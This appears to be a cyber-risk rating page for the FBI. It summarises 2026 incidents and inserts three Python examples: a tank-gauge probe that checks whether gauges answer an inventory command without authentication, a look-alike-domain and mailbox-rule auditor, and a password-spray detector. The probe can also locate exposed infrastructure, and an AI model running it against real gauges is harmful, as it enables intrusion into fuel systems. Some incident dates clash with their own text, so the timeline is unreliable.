Rankiteo
Leader in Cyber Underwriting
Federal Bureau of Investigation (FBI) Vendor Cyber Rating & Cyber Score

fbijobs.gov

This is the official Federal Bureau of Investigation (FBI) LinkedIn account and is used to build awareness of workplace culture, engagement opportunities, and the FBI mission. The FBI does not collect comments or messages through this account. The FBI is the premier law enforcement agency in the world. We are an intelligence-driven, outcome-focused national security organization. Steeped in a history of innovation and determination, the Bureau is a collective of individuals united under one unwavering mission: to protect the American people and uphold the U.S. Constitution. The FBI mission guides our efforts and focuses our resources on critical threats, while our core values—respect, integrity, accountability, leadership, compassion,


FBI A.I CyberSecurity Scoring
Company Information
Website: http://www.fbijobs.gov
Employees: 10,118
Followers: 936,451
NAICS: 92212
Industry Type: Law Enforcement
Homepage: fbijobs.gov
FBI Risk Score (AI oriented)
Score: 100/1000, grade C (Critical; the Critical band runs from 0 to 549)
Industry: Law Enforcement
Updated: 12/06/2026
Powered by our proprietary A.I cyber incident model
FBI Global Score (TPRM): score locked (insurers use the TPRM score to calculate premium); detailed risk factors, vulnerabilities, peer benchmarks and findings require access.

FBI: current score 100 C (Critical) on a 0 to 1000 scale; 26 incidents; average score impact per incident -60.33.
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
Score before incident: 100
MAY 2026
Score before incident: 100
Cyber Attack, 16 May 2026, FBI
FBI and Cybersecurity and Infrastructure Security Agency: Cyber attack hits US gas stations, officials suspect Iran
U.S. Investigates Iranian-Linked Cyberattacks on Fuel Monitoring Systems
Score after incident: 100 (Critical, change 0)
Incident ID: FBIOFF1778905426
U.S. cybersecurity officials are probing a series of breaches targeting automatic tank gauge (ATG) systems used to monitor fuel levels at gas stations, with early indications pointing to Iranian-linked hackers. The attacks exploited poorly secured systems left exposed online without password protection, allowing threat actors to access and, in some cases, manipulate display readings. Investigators confirmed that actual fuel quantities in storage tanks were unaffected, and no physical damage or leaks have been reported.

While the immediate impact appears limited, experts warn that unauthorized access to ATG systems could let attackers mask real fuel leaks or disrupt monitoring operations, raising concerns about vulnerabilities in U.S. critical infrastructure, particularly the oil and gas sector. The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have not publicly attributed the attacks, though U.S. officials suspect Iranian involvement based on past incidents targeting similar systems, including water utilities and energy networks.

The incident underscores growing risks to internet-connected industrial systems, which researchers have long flagged as poorly secured and prime targets. Iran-linked groups have previously been tied to disruptions of U.S. companies and government systems, with recent activity showing increased sophistication amid heightened geopolitical tensions involving Iran, the U.S., and Israel. The attacks fit a broader pattern of escalating cyber operations, including phishing campaigns, data leaks, and infrastructure-focused disruptions.
INCIDENT DETAILS
Type: Cyberattack
Motivation: Disruption of monitoring operations, potential masking of fuel leaks
Impact: Systems affected: automatic tank gauge (ATG) systems at gas stations. Operational impact: manipulation of display readings, potential disruption of monitoring operations.
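The incident above turns on gauges that answer queries with no security code set. The following added example (written for this page; it is not code from the FBI, CISA or any gauge vendor) probes an ATG for that condition and classifies the reply. It assumes the Veeder-Root TLS-350 command set (SOH-prefixed function codes on TCP port 10001, I20100 for the in-tank inventory report, a 9999FF1B reply when a security code is required); those protocol details and the sample replies are assumptions, not taken from the page, and the fake responder exists only so the check runs offline.

```python
"""Added example: probe an automatic tank gauge for the 'no security code'
condition behind the incident above. Not FBI/CISA/vendor code. Protocol
details (SOH-prefixed function codes on TCP/10001, I20100 = in-tank inventory,
9999FF1B = error/unauthorised) are assumptions about the Veeder-Root TLS-350
command set; the replies below are constructed samples and the fake responder
exists only so the check runs offline."""
import socket
import threading

SOH, ETX = b"\x01", b"\x03"
ATG_PORT = 10001                      # assumed default TLS-350 TCP port
INVENTORY_CMD = SOH + b"I20100\n"     # assumed: in-tank inventory report, no security code

# Constructed reply from a gauge with no security code configured.
OPEN_REPLY = (
    SOH + b"I20100\r\n"
    b"MAY 16, 2026  3:14 AM\r\n\r\n"
    b"STATION 42\r\n\r\n"
    b"IN-TANK INVENTORY\r\n\r\n"
    b"TANK PRODUCT      VOLUME TC VOLUME   ULLAGE  HEIGHT  WATER  TEMP\r\n"
    b"  1  REGULAR        6012      5988     3988   41.20   0.00  62.1\r\n"
    b"  2  PREMIUM        3377      3360     6623   28.44   0.00  61.9\r\n"
    b"  3  DIESEL         8101      8070     1899   52.71   0.31  60.4\r\n"
    b"\r\n" + ETX
)
# Constructed reply from a gauge that requires a security code (assumed error code).
PROTECTED_REPLY = SOH + b"9999FF1B" + ETX

def classify_reply(reply: bytes) -> dict:
    """Turn a raw reply into a finding: 'open' (inventory readable without
    authentication), 'protected' (gauge rejected the bare command) or 'unknown'."""
    if reply.startswith(SOH + b"9999FF1B"):
        return {"status": "protected", "tanks": []}
    if not reply.startswith(SOH + b"I20100"):
        return {"status": "unknown", "tanks": []}
    tanks = []
    for line in reply.decode("ascii", "replace").splitlines():
        f = line.split()
        if len(f) >= 8 and f[0].isdigit():   # numbered tank rows only
            tanks.append({"tank": int(f[0]), "product": f[1],
                          "volume": int(f[2]), "water": float(f[6])})
    return {"status": "open", "tanks": tanks}

def probe_atg(host: str, port: int = ATG_PORT, timeout: float = 3.0) -> dict:
    """Send the bare inventory command and classify what comes back. 'open' is
    the finding: anyone who can reach the port can read the gauge, and the
    incident above shows displayed readings being altered over the same path."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(INVENTORY_CMD)
        buf = b""
        while ETX not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return classify_reply(buf)

def fake_atg(reply: bytes) -> int:
    """Constructed stand-in for an exposed gauge on loopback; returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def serve():
        conn, _ = srv.accept()
        with conn:
            if conn.recv(64).startswith(SOH):
                conn.sendall(reply)
        srv.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    for label, reply in (("no security code", OPEN_REPLY), ("security code set", PROTECTED_REPLY)):
        result = probe_atg("127.0.0.1", fake_atg(reply))
        print(f"{label}: {result['status']}, {len(result['tanks'])} tanks readable")
```

Run against your own gauge IPs (with permission) rather than the loopback fakes; an "open" result on an internet-reachable address is exactly the exposure the incident describes, and the fix is to set a security code on the gauge and put the port behind a VPN or firewall rather than leaving it reachable from the internet.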
MAY 2026
Score before incident: 100
Cyber Attack, 05 May 2026, FBI
FBI: FBI warns cyber-enabled cargo theft is surging as losses hit $725 million in 2025
FBI Warns of Surging Cyber-Enabled Cargo Theft
Score after incident: 100 (Critical, change 0)
Incident ID: FBI1779517614
The FBI has issued a public alert warning of a sharp rise in cyber-enabled strategic cargo theft, in which threat actors impersonate brokers and carriers to hijack and resell high-value shipments. In 2025, losses in the U.S. and Canada reached nearly $725 million, a 60% year-over-year increase, while confirmed incidents rose 18% and the average theft value climbed 36% to $273,990.

Attackers gain access to logistics systems through phishing, spoofed emails, and compromised carrier accounts, then manipulate load boards by posting fraudulent listings or altering legitimate shipments. Once inside, they hijack identities, double-broker loads, and modify critical documents such as bills of lading and delivery addresses to reroute cargo. Some schemes culminate in ransom demands after shipments vanish.

The FBI detailed a multi-step operation: threat actors first deploy remote access tools via malicious links, then flood load boards with fake listings while bidding on real shipments using stolen credentials. They sustain the deception by altering carrier contact and insurance details, delaying detection until goods are stolen and resold.

Key warning signs include unauthorized shipment notifications, spoofed emails with slight domain variations, and requests to download documents from suspicious links. Compromised accounts may show unusual mailbox rules, such as auto-forwarding or hidden folders, and attackers often use short-lived VoIP numbers for communication. The alert underscores the growing sophistication of cyber-enabled cargo theft, which targets the transportation and logistics sectors with high-value, selective attacks.
INCIDENT DETAILS
Type: Cyber-enabled cargo theft
Motivation: Financial gain; resale of high-value shipments
Impact: Financial loss: $725 million (2025, U.S. and Canada). Systems affected: logistics systems, load boards. Operational impact: unauthorized rerouting of shipments, identity hijacking, double-brokering of loads. Identity theft risk: high (identity hijacking of brokers/carriers).
Data breach: carrier credentials, shipment details, bills of lading, delivery addresses. Sensitivity of data: high (logistics and shipment data).
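Two of the warning signs in the alert above, sender domains with slight variations and mailbox rules that forward or hide correspondence, lend themselves to automated triage. The following added example is not FBI code; the carrier domains, sender addresses, mailbox rules and thresholds are constructed for illustration, and the rule schema (name, subject_contains, forward_to, move_to, delete) is an assumed simplification of what a mail platform exports.

```python
"""Added example: triage two cargo-theft indicators from the FBI alert,
look-alike sender domains and suspicious mailbox rules. Not FBI code; all
domains, addresses and rules are constructed samples, and the rule schema is
an assumed simplification of what a mail platform exports."""
from difflib import SequenceMatcher
import unicodedata

# Constructed: the brokers/carriers this dispatcher legitimately deals with.
KNOWN_DOMAINS = {"acmefreight.com", "bluelinecarriers.com", "loadboard.example"}

def normalize(domain: str) -> str:
    """Fold the usual look-alike tricks so 'acrne-freight.c0m' reads as 'acmefreight.com'."""
    d = unicodedata.normalize("NFKD", domain.lower()).encode("ascii", "ignore").decode()
    d = d.replace("rn", "m").replace("vv", "w")     # kerning look-alikes
    d = d.translate(str.maketrans("0135", "oles"))  # digit-for-letter swaps
    return d.replace("-", "")

def lookalike_of(sender: str, known=KNOWN_DOMAINS, threshold=0.9):
    """Return the known domain a sender impersonates, or None.
    An exact match is legitimate; a near miss after normalisation is the
    'slight domain variation' the alert describes."""
    domain = sender.rsplit("@", 1)[-1].lower()
    if domain in known:
        return None
    nd = normalize(domain)
    best, score = None, 0.0
    for k in known:
        r = SequenceMatcher(None, nd, normalize(k)).ratio()
        if r > score:
            best, score = k, r
    return best if score >= threshold else None

# Folders attackers park hijacked mail in so the real user never sees it.
HIDEAWAY_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                    "junk email", "archive", "deleted items"}
SHIPMENT_TERMS = ("load", "rate confirmation", "bill of lading", "bol",
                  "invoice", "broker", "password")

def audit_mailbox_rules(rules, org_domain):
    """Flag rules that forward outside the organisation, hide mail in an
    unlikely folder, or silently delete shipment/broker correspondence.
    Returns [(rule name, [reasons])]."""
    findings = []
    for rule in rules:
        reasons = []
        external = [a for a in rule.get("forward_to", [])
                    if not a.lower().endswith("@" + org_domain)]
        if external:
            reasons.append(f"auto-forwards to external {external}")
        folder = rule.get("move_to", "")
        if folder.lower() in HIDEAWAY_FOLDERS or folder.startswith("."):
            reasons.append(f"hides mail in '{folder}'")
        subject = " ".join(rule.get("subject_contains", [])).lower()
        # A filing rule on 'load' is normal; deleting or diverting such mail is not.
        if (rule.get("delete") or reasons) and any(t in subject for t in SHIPMENT_TERMS):
            reasons.append("targets shipment/broker correspondence")
        if reasons:
            findings.append((rule["name"], reasons))
    return findings

# Constructed export from a dispatcher's mailbox: one benign filing rule,
# one classic hijack rule, one silent-delete rule, one internal forward.
SAMPLE_RULES = [
    {"name": "Loads", "subject_contains": ["load"], "move_to": "Loads"},
    {"name": ".", "subject_contains": ["rate confirmation", "bill of lading"],
     "forward_to": ["dispatch.acmefreight@gmail.com"], "move_to": "RSS Feeds"},
    {"name": "cleanup", "subject_contains": ["invoice"], "delete": True},
    {"name": "Team", "forward_to": ["ops@acmefreight.com"]},
]
SAMPLE_SENDERS = ["ops@acmefreight.com", "dispatch@acrnefreight.com",
                  "billing@acme-freight.com", "carrier@bIuelinecarriers.com",
                  "noreply@gmail.com"]

if __name__ == "__main__":
    for s in SAMPLE_SENDERS:
        print(f"{s:32} -> {lookalike_of(s) or 'ok'}")
    for name, why in audit_mailbox_rules(SAMPLE_RULES, "acmefreight.com"):
        print(f"rule {name!r}: {'; '.join(why)}")
```

The domain check deliberately whitelists exact matches and only scores near misses, so a genuine carrier never trips it; tune the 0.9 threshold against your own partner list. The rule audit is the part to schedule: pull inbox rules for every dispatcher account and alert on any rule that forwards externally or files mail into a folder nobody reads.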
APRIL 2026
Score before incident: 100
Breach, 22 Apr 2026, FBI
Agoda, Booking.com and Booking Holdings: Agoda refutes claims of massive data breach
Agoda Denies Data Breach as Cybercriminals Claim Theft of 82 Million Records
Score after incident: 100 (Critical, change 0)
Incident ID: AGOBOO1776904233
Asia-based travel booking platform Agoda has refuted claims of a data breach after cybercriminals alleged the theft of 82 million user records. An Agoda spokesperson stated that internal investigations confirmed the leaked data did not originate from its systems.

Researchers at Cybernews analyzed a sample of 23 records provided by the attackers, which included full names, identity card numbers, phone numbers, email addresses, and hotel addresses, primarily linked to Malaysian users. Notably, the sample lacked reservation dates, an unusual omission that raised questions about the data's origin; the researchers nonetheless verified that the exposed information itself was genuine.

The claim follows a recent confirmation by Agoda's parent company, Booking Holdings, of a separate breach affecting Booking.com users. That attack exposed names, phone numbers, email addresses, and reservation details, leading to a surge in reservation-hijacking scams across North America, Europe, and the UK. The timing of the two incidents has heightened concerns about cybersecurity risks in the travel industry.
INCIDENT DETAILS
Type: Data breach (alleged)
Impact: Data compromised: 82 million records allegedly stolen. Brand reputation impact: potential reputational damage from the breach claims. Identity theft risk: high (exposure of full names, identity card numbers, phone numbers, email addresses).
Data breach: full names, identity card numbers, phone numbers, email addresses, hotel addresses. Number of records exposed: 82 million (alleged). Sensitivity of data: high (personally identifiable information). Data exfiltration: claimed by cybercriminals. Personally identifiable information: yes.
APRIL 2026
Score before incident: 100
Cyber Attack, 07 Apr 2026, FBI
FBI: FBI says cybercrime losses hit record $20.87B in 2025
FBI Reports Record $20.87 Billion in Cybercrime Losses for 2025, Driven by AI-Enhanced Scams
Score after incident: 100 (Critical, change 0)
Incident ID: FBI1776097914
The FBI's 2025 Internet Crime Report revealed a historic surge in cybercrime, with reported losses reaching $20.87 billion, the first time losses exceeded $20 billion. Complaints submitted to the Internet Crime Complaint Center (IC3) surpassed one million, a 17% increase from 2024.

Top threats and financial impact: Phishing remained the most reported crime (191,561 complaints), but investment scams caused the highest losses ($8.6 billion), followed by business email compromise (BEC) and tech support scams. Cyber-enabled fraud, the use of digital tools to execute traditional scams, accounted for 45% of complaints but 85% of financial losses, while classic cyber threats such as ransomware and data breaches made up 75% of reported incidents.

AI's growing role in cybercrime: For the first time, the IC3 report included an AI-focused section, attributing 22,364 complaints and $893 million in losses to AI-enabled schemes, though the FBI cautioned that actual figures may be higher due to underreporting. Key AI-driven schemes included:
- BEC attacks (high financial losses, despite fewer AI-specific reports)
- Romance/confidence scams (fake profiles, voice cloning)
- Employment fraud (deepfake interviews, forged documents)
- Investment cons (AI-generated videos impersonating public figures)
Complaints for these scams rose sharply from 2023 to 2025, with corresponding increases in financial losses.

Government impersonation scams surge: One notable outlier was government impersonation scams, which saw a 128% increase in complaints (from 14,190 in 2023 to 32,424 in 2025). The FBI had previously warned of AI-generated voice and text messages mimicking senior U.S. officials to target government personnel and their contacts.

The report underscores how cybercriminals are leveraging AI to refine traditional scams, making them more profitable and harder to detect. While AI-related losses remain a fraction of the total, their rapid growth signals a shifting threat landscape.
INCIDENT DETAILS
Type: Phishing, investment scams, business email compromise (BEC), tech support scams, ransomware, data breaches, government impersonation scams
Motivation: Financial gain, fraud
Impact: Financial loss: $20.87 billion. Complaints: 1,000,000+.
MARCH 2026
Score before incident: 100
Breach, 21 Mar 2026, FBI
U.S. Federal Bureau of Investigation: Pro-Iranian hackers expose FBI Director’s personal data in security breach
Pro-Iranian Hackers Leak Alleged Private Documents of FBI Official Kash Patel
Score after incident: 100 (Critical, change 0)
Incident ID: FBI1774672716
A pro-Iranian hacking group, Handala Hack, has released purported private documents and images of FBI Director Kash Patel. Department of Justice (DOJ) sources confirmed the leak to Fox News, though officials have not verified the authenticity of the circulating photos. The group published a statement on its newly launched website declaring the incident proof of the "collapse of American security legends."

The leak came one week after the DOJ seized two web domains linked to Handala Hack as part of a broader operation targeting Iranian-backed cyberattacks, transnational repression, and psychological operations. Handala Hack framed the breach as a direct response to what it called the FBI's "ridiculous spectacle" of recent countermeasures. The group claims its team penetrated the FBI's "impenetrable" systems within hours and has made Patel's emails, conversations, documents, and classified files publicly available for download, asserting the attack would be "etched forever in memory." These remain the group's own claims; officials have not confirmed them.

The incident underscores escalating cyber tensions between Iranian-linked threat actors and U.S. law enforcement following recent disruptions of the group's infrastructure.
INCIDENT DETAILS
Type: Data breach (claimed)
Motivation: Retaliation for DOJ's seizure of web domains linked to Iranian-backed cyberattacks
Impact: Data compromised (as claimed): emails, conversations, documents, classified files. Systems affected: FBI systems. Brand reputation impact: undermined confidence in FBI security. Identity theft risk: high (for the affected individual).
Data breach: emails, conversations, documents, classified files. Sensitivity of data: high. Data exfiltration: claimed, not verified. Personally identifiable information: yes.
MARCH 2026
Score before incident: 148
Breach, 05 Mar 2026, FBI
FBI, Verizon, AT&T, U.S. Treasury, Lumen and Windstream: FBI investigating hack on its wiretap and surveillance systems: Report
FBI Network Breach Targets Surveillance Systems
Score after incident: 100 (Critical, change -48)
Incident ID: LUMATTVERFBIWINFIN1772764213
Hackers have reportedly compromised an FBI network used to manage wiretaps and foreign intelligence surveillance warrants, according to a CNN report citing an anonymous source. An FBI spokesperson confirmed that the bureau detected and addressed "suspicious activities" on its systems but provided no further details.

The incident is the latest in a string of high-profile cyberattacks on U.S. government agencies and corporations. Last year, Chinese hackers infiltrated the U.S. Treasury and the National Nuclear Security Administration, while Russian operatives stole sealed court records. Separately, the Chinese state-linked group Salt Typhoon breached at least 200 U.S. companies, including major telecommunications providers AT&T, Verizon, Lumen, Charter Communications, and Windstream.

The FBI has not disclosed the extent of the breach or the identity of the attackers, but the incident underscores ongoing threats to critical U.S. infrastructure.
INCIDENT DETAILS
Type: Network breach
Impact: Data compromised: wiretap and foreign intelligence surveillance warrant data. Systems affected: FBI network managing surveillance systems.
Data breach: Type of data compromised: wiretap and foreign intelligence surveillance warrant data. Sensitivity of data: high.
MARCH 2026
Score before incident: 296
Breach, 01 Mar 2026, FBI
Federal Bureau of Investigation: Iran-linked hackers claim breach of FBI drone program, threaten World Cup security
Iran-Linked Hacking Group Claims Breach of FBI Drones Ahead of 2026 World Cup
Score after incident: 147 (Critical, change -149)
Incident ID: FBI1781282098
An Iran-affiliated hacking group, Handala, has claimed it breached FBI-operated first-person view (FPV) drones and gained access to months of collected data, including images and intelligence from counterterrorism operations. According to the SITE Intelligence Group, the group alleged the drones were equipped with facial recognition and license plate-reading technology. In a statement, Handala issued a veiled threat tied to the 2026 FIFA World Cup: "Better tighten your World Cup security… FPVs are everywhere; you never know when one might end up right in your team's bus."

The FBI has confirmed drones will be deployed for security at World Cup venues, and unauthorized flights are prohibited near stadiums and fan zones. The tournament's matches began on June 11.

SITE cast doubt on Handala's claims, noting that at least one video presented as evidence appeared to be unrelated 2024 footage of U.S. police drone software used after tornado damage. The group has a history of unverified assertions, including a March claim that it hacked an FBI official's email account. The claim follows broader warnings from U.S. officials about Iranian cyber threats, particularly after recent U.S. and Israeli strikes on Tehran. The State Department has offered a $10 million reward for information leading to the identification of Handala members.
INCIDENT DETAILS
Type: Cyber espionage (claimed, unverified)
Motivation: Geopolitical; threat to 2026 World Cup security
Impact (as claimed): Data compromised: sensitive images and intelligence from counterterrorism operations, facial recognition data, license plate-reading data. Systems affected: FBI-operated FPV drones. Operational impact: potential compromise of counterterrorism operations and World Cup security. Brand reputation impact: potential reputational damage to the FBI and U.S. security agencies. Identity theft risk: high (facial recognition and license plate data).
Data breach (as claimed): Type of data compromised: images, intelligence data, facial recognition data, license plate-reading data. Sensitivity of data: high. Personally identifiable information: yes (facial recognition and license plate data).
Cyber Attack, 01 Mar 2026, FBI
Federal Bureau of Investigation: FBI declares suspected Chinese hack of US surveillance system a ‘major cyber incident’
FBI Cyber Incident Linked to Chinese Hackers
Score after incident: 147 (Critical, change -149)
Incident ID: FBI1775075315
FBI Confirms Major Cyber Incident Linked to Chinese Hackers

The FBI recently notified Congress of a significant cyber intrusion under the Federal Information Security Modernization Act (FISMA), a rare declaration of a "major incident" involving its own systems. The breach, attributed to sophisticated hackers likely backed by China, compromised sensitive data, including legal surveillance returns such as pen register and trap-and-trace records and personally identifiable information tied to FBI investigations. The attackers gained their foothold through a commercial internet service provider's vendor infrastructure.

The exact trigger for the FISMA designation remains unclear, but such incidents typically involve the exfiltration of data posing acute risks to national security, foreign relations, or public confidence. Former FBI cyber division official Cynthia Kaiser noted that the bureau has not reported a major incident of this scale since at least 2020. Pen register and trap-and-trace tools, which record call and internet activity without capturing content, are highly valuable to foreign intelligence services because they can reveal who the FBI is surveilling.

The incident appears unrelated to the recent Iranian-linked compromise of FBI Director Kash Patel's emails but aligns with China's escalating cyber operations against U.S. national security systems. Sen. Mark Warner (D-Va.), chair of the Senate Intelligence Committee, described the breach as a stark reminder of China's growing cyber aggression. Under FISMA, the declaration should trigger an interagency response, though it remains unclear whether containment efforts have succeeded. The White House convened a meeting in early March with officials from the FBI, NSA, and CISA to address the breach.

Chinese hackers have increasingly used commercial communications providers as entry points into federal networks; recent campaigns by groups such as Volt Typhoon and Salt Typhoon compromised critical infrastructure and telecommunications providers, including the theft of call records and FBI wiretap data. While U.S. officials believe the FBI acted swiftly to mitigate the incident, the breach highlights persistent exposure even in systems designed to be the most secure, and the relentless threat posed by state-backed adversaries.
INCIDENT DETAILS
Type: Data breach
Motivation: Espionage, national security compromise
Impact: Data compromised: legal surveillance returns (pen register and trap-and-trace records), personally identifiable information tied to FBI investigations. Systems affected: FBI systems. Operational impact: compromise of sensitive surveillance data. Brand reputation impact: potential erosion of public confidence. Identity theft risk: high (personally identifiable information exposed).
Data breach: legal surveillance data, personally identifiable information. Sensitivity of data: high (national security implications). Data exfiltration: likely (implied by "exfiltration of data posing acute risks"). Personally identifiable information: yes.
FEBRUARY 2026
Score before incident: 309
Cyber Attack, 17 Feb 2026, FBI
AT&T, Verizon and Federal Bureau of Investigation: FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System
FBI Investigates Sophisticated Breach of Surveillance System Holding Sensitive Law Enforcement Data
Score after incident: 292 (Critical, change -17)
Incident ID: FBIATTVER1772836650
The FBI, alongside agencies including CISA and the NSA, is probing a cyber intrusion into the Digital Collection System Network (DCSNet), an unclassified but highly sensitive surveillance platform used to store law enforcement data. The breach was first detected on February 17, and the FBI notified Congress this week after identifying unusual activity linked to the system.

DCSNet holds legal process returns such as pen register and trap-and-trace data along with personally identifiable information (PII) on subjects of FBI investigations. Pen registers, which log dialed phone numbers, were among the compromised records. The attacker employed advanced techniques, including leveraging a commercial ISP's infrastructure to bypass security controls, a tactic increasingly used by nation-state actors. While the FBI has not identified the attacker, the incident aligns with recent campaigns by Chinese and Russian hacking groups that have targeted U.S. government and telecom networks via ISP compromises. Notably, the China-linked group Salt Typhoon breached major telecom providers including Verizon, AT&T, and Lumen Technologies in 2024, raising concerns about supply-chain infiltration.

The breach occurs amid heightened cyber tensions, including Iran-backed hacking activity following U.S.-Israeli airstrikes on February 28, although most Iranian cyber operations have focused on Middle Eastern and European targets rather than the U.S. The investigation also unfolds against a backdrop of staffing cuts at key cybersecurity agencies: the FBI dismissed nearly two dozen employees, many in cyber and counterintelligence roles, just days before the Iran strikes. Security experts warn the breach underscores the risk of institutional knowledge loss; Damon Small of Xcape described the departure of experienced defenders as creating a "catastrophic vulnerability window" that leaves critical systems exposed. The FBI has released no further details, but the involvement of the White House, NSA, and Justice Department signals the severity of the compromise.
INCIDENT DETAILS
Type: Data breach
Motivation: Espionage
Impact: Data compromised: pen register and trap-and-trace data, personally identifiable information (PII). Systems affected: Digital Collection System Network (DCSNet). Operational impact: compromise of sensitive law enforcement surveillance data. Brand reputation impact: high. Identity theft risk: high.
Data breach: pen register data, trap-and-trace data, personally identifiable information (PII). Sensitivity of data: high. Personally identifiable information: yes.
FEBRUARY 2026
Score before incident: 304
Breach, 04 Feb 2026, FBI
Social Security Administration: The Social Security data breach is a national-security disaster that could hurt Americans for the rest of their lives: whistleblower
Potential Massive Social Security Data Breach
Score after incident: 229 (Critical, change -75)
Incident ID: SOC1770609457
Former SSA Chief Data Officer Warns of Massive Social Security Data Breach

A whistleblower has raised alarms over a potential national security disaster involving the exposure of sensitive Social Security data for every American who has or ever had a Social Security number (SSN). Chuck Borges, the former chief data officer of the Social Security Administration (SSA), resigned in August and filed a complaint alleging that employees of the Department of Government Efficiency (DOGE) uploaded a copy of the SSA's database to an unsecured cloud environment.

According to Borges, the breach, if confirmed, could leave personal data including names, SSNs, and addresses vulnerable to fraud and exploitation, with lifelong consequences for millions of Americans. He has called for a congressional investigation into the alleged mismanagement, framing the incident as a severe threat to national security. The SSA has not publicly confirmed the breach, but the whistleblower's claims highlight critical weaknesses in government data handling. If verified, the exposure could have far-reaching implications for identity theft, financial fraud, and cybersecurity risk across the U.S., and it underscores ongoing concerns about federal agencies' ability to safeguard sensitive citizen data.
INCIDENT DETAILS
Type: Data breach (alleged)
Impact: Data compromised: names, SSNs, addresses. Systems affected: SSA database. Brand reputation impact: severe. Legal liabilities: potential. Identity theft risk: high.
Data breach: Type of data compromised: personally identifiable information (PII). Number of records exposed: potentially all Americans with an SSN. Sensitivity of data: high. Personally identifiable information: names, SSNs, addresses.
JANUARY 2026
Score before incident: 311
Cyber Attack, 05 Jan 2026, FBI
FBI, CISA, U.S. Department of Homeland Security and Defense Department's Cyber Crime Center: US Homeland Security warns of escalating Iranian cyberattack risks
DHS Warning of Escalating Cyberattack Risks by Iran-Backed Hacking Groups
Score after incident: 294 (Critical, change -17)
Incident ID: FBICISUS-UNI1767786135
The U.S. Department of Homeland Security (DHS) issued a National Terrorism Advisory System (NTAS) bulletin on Sunday warning of heightened cyberattack risk from Iran-backed hacking groups and pro-Iranian hacktivists following recent geopolitical escalations. The advisory describes a "heightened threat environment" in the U.S., with low-level cyberattacks likely against vulnerable networks. DHS also cautioned that violent extremists within the U.S. could mobilize in response to the Israel-Iran conflict, particularly if Iranian leadership issues a religious ruling calling for retaliatory violence, and noted that anti-Semitic and anti-Israel sentiment has already motivated recent domestic attacks.

The warning follows a pattern of Iranian state-affiliated hackers and hacktivists exploiting poorly secured U.S. networks. In October, authorities in the U.S., Canada, and Australia reported that Iranian hackers were acting as initial access brokers, breaching organizations in the healthcare, government, IT, engineering, and energy sectors through brute-force attacks, password spraying, and MFA fatigue (push bombing). A separate August advisory from CISA, the FBI, and the Defense Department's Cyber Crime Center (DC3) identified Br0k3r (also known as Pioneer Kitten, Fox Kitten, and other aliases) as a state-sponsored Iranian group that sells access to compromised networks to ransomware affiliates in exchange for a share of the profits.

While DHS did not explicitly link the NTAS bulletin to recent events, the warning comes after U.S. strikes on Iranian nuclear facilities at Fordow, Natanz, and Isfahan on Saturday, just over a week after Israel targeted Iranian nuclear and military sites on June 13. Iran's Foreign Minister, Abbas Araghchi, responded by warning of "everlasting consequences" and asserting Iran's right to defend its sovereignty.
INCIDENT DETAILS
Type: Cyberattack, initial access brokerage, ransomware
Motivation: Retaliation for U.S. strikes on Iranian nuclear facilities; financial gain (ransomware payments); political/ideological (anti-Semitic or anti-Israel sentiment)
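The advisory above names password spraying and MFA fatigue (push bombing) as the initial-access techniques. The following added example, which is not from DHS, CISA or the FBI, runs detection logic for both over a handful of constructed authentication log lines; the key=value log format, field names, thresholds and window sizes are assumptions chosen for illustration.

```python
"""Added example: spot password spraying and MFA push bombing in auth logs.
Not from DHS/CISA/FBI. Log format, field names and thresholds are assumptions;
the log lines are constructed samples."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one source spraying six accounts, one user being
# push-bombed until they approve, plus benign noise.
SAMPLE_LOG = """
2026-01-04T02:00:01Z src=203.0.113.7 user=alice event=login result=fail
2026-01-04T02:00:40Z src=203.0.113.7 user=bob event=login result=fail
2026-01-04T02:01:15Z src=203.0.113.7 user=carol event=login result=fail
2026-01-04T02:02:02Z src=203.0.113.7 user=dave event=login result=fail
2026-01-04T02:02:30Z src=192.0.2.10 user=alice event=login result=ok
2026-01-04T02:03:30Z src=203.0.113.7 user=erin event=login result=fail
2026-01-04T02:04:58Z src=203.0.113.7 user=frank event=login result=fail
2026-01-04T02:10:00Z src=198.51.100.9 user=bob event=login result=fail
2026-01-04T02:11:00Z src=198.51.100.9 user=bob event=login result=fail
2026-01-04T02:12:00Z src=198.51.100.9 user=bob event=login result=ok
2026-01-04T03:10:00Z src=203.0.113.7 user=carol event=mfa_push result=denied
2026-01-04T03:10:25Z src=203.0.113.7 user=carol event=mfa_push result=timeout
2026-01-04T03:10:50Z src=203.0.113.7 user=carol event=mfa_push result=denied
2026-01-04T03:11:20Z src=203.0.113.7 user=carol event=mfa_push result=denied
2026-01-04T03:11:55Z src=203.0.113.7 user=carol event=mfa_push result=timeout
2026-01-04T03:12:30Z src=203.0.113.7 user=carol event=mfa_push result=approved
2026-01-04T03:20:00Z src=192.0.2.11 user=dave event=mfa_push result=denied
2026-01-04T03:20:30Z src=192.0.2.11 user=dave event=mfa_push result=approved
"""

def parse_line(line: str) -> dict:
    """'ts k=v k=v ...' -> dict with a datetime under 'ts' (assumed format)."""
    ts, *pairs = line.split()
    event = dict(p.split("=", 1) for p in pairs)
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event

EVENTS = [parse_line(l) for l in SAMPLE_LOG.strip().splitlines()]

def _windows(events, window):
    """Yield (start, end) index pairs for every sliding time window over
    the events, which are sorted in place by timestamp first."""
    events.sort(key=lambda e: e["ts"])
    start = 0
    for end in range(len(events)):
        while events[end]["ts"] - events[start]["ts"] > window:
            start += 1
        yield start, end

def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Spraying looks like one source failing against many *different* accounts
    (brute force is the opposite: many failures against one account), so the
    signal is distinct usernames per source, not failure count.
    Returns {src: max distinct users failed within any window}."""
    by_src = defaultdict(list)
    for e in events:
        if e["event"] == "login" and e["result"] == "fail":
            by_src[e["src"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        for s, t in _windows(evs, window):
            users = {e["user"] for e in evs[s:t + 1]}
            if len(users) >= min_users:
                hits[src] = max(hits.get(src, 0), len(users))
    return hits

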